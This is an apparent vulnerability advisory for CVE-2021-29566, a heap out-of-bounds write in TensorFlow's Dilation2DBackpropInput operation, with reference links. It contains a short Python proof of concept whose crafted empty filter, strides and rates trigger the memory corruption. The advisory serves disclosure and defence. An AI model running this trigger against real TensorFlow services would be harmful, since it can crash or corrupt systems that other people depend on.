CVE-2021-29566: Heap OOB access in `Dilation2DBackpropInput`
(updated )
An attacker can write outside the bounds of heap allocated arrays by passing invalid arguments to tf.raw_ops.Dilation2DBackpropInput
:
import tensorflow as tf
input_tensor = tf.constant([1.1] * 81, shape=[3, 3, 3, 3], dtype=tf.float32)
filter = tf.constant([], shape=[0, 0, 3], dtype=tf.float32)
out_backprop = tf.constant([1.1] * 1062, shape=[3, 2, 59, 3], dtype=tf.float32)
tf.raw_ops.Dilation2DBackpropInput(
input=input_tensor, filter=filter, out_backprop=out_backprop,
strides=[1, 40, 1, 1], rates=[1, 56, 56, 1], padding='VALID')
References
- github.com/advisories/GHSA-pvrc-hg3f-58r6
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-cpu/PYSEC-2021-494.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-gpu/PYSEC-2021-692.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow/PYSEC-2021-203.yaml
- github.com/tensorflow/tensorflow
- github.com/tensorflow/tensorflow/commit/3f6fe4dfef6f57e768260b48166c27d148f3015f
- github.com/tensorflow/tensorflow/security/advisories/GHSA-pvrc-hg3f-58r6
- nvd.nist.gov/vuln/detail/CVE-2021-29566
Detect and mitigate CVE-2021-29566 with GitLab Dependency Scanning
Secure your software supply chain by verifying that all open source dependencies used in your projects contain no disclosed vulnerabilities. Learn more about Dependency Scanning →